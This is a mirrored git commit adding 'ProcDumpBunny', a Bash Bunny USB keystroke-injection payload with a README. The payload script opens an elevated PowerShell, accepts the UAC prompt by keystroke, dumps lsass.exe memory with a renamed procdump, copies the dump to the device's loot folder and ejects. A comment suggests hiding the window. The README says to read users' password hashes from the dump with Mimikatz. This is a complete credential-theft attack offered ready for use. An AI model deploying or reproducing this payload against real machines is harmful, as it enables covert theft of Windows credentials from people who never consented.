mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Created ProcDumpBunny
Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz
This commit is contained in:
21
payloads/library/credentials/ProcDumpBunny/README.md
Normal file
21
payloads/library/credentials/ProcDumpBunny/README.md
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
**Title: ProcDumpBunny**
|
||||||
|
|
||||||
|
Author: 0iphor13
|
||||||
|
|
||||||
|
Version: 1.0
|
||||||
|
|
||||||
|
What is ProcDumpBunny?
|
||||||
|
#
|
||||||
|
*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
|
||||||
|
#
|
||||||
|
|
||||||
|
**Instruction:**
|
||||||
|
|
||||||
|
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||||
|
![alt text]
|
||||||
|
Place Bunny.exe in the same payload switch as your payload
|
||||||
|
![alt text]
|
||||||
|
#
|
||||||
|
Plug in BashBunny.
|
||||||
|
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||||
|
![alt text]
|
||||||
BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (37).png
Normal file
BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (37).png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 8.7 KiB |
BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (38).png
Normal file
BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (38).png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 78 KiB |
BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (39).png
Normal file
BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (39).png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 61 KiB |
44
payloads/library/credentials/ProcDumpBunny/payload.txt
Normal file
44
payloads/library/credentials/ProcDumpBunny/payload.txt
Normal file
@@ -0,0 +1,44 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: ProcDumpBunny
|
||||||
|
# Description: Dump lsass.exe with a renamed version of procdump
|
||||||
|
# Author: 0iphor13
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Credentials
|
||||||
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
DUCKY_LANG de
|
||||||
|
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||||
|
|
||||||
|
LED STAGE1
|
||||||
|
|
||||||
|
#After you have adapted the delays for your target, add "-W hidden"
|
||||||
|
Q DELAY 1000
|
||||||
|
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1000
|
||||||
|
Q ALT j
|
||||||
|
Q DELAY 250
|
||||||
|
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||||
|
Q DELAY 250
|
||||||
|
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||||
|
Q DELAY 300
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
Reference in New Issue
Block a user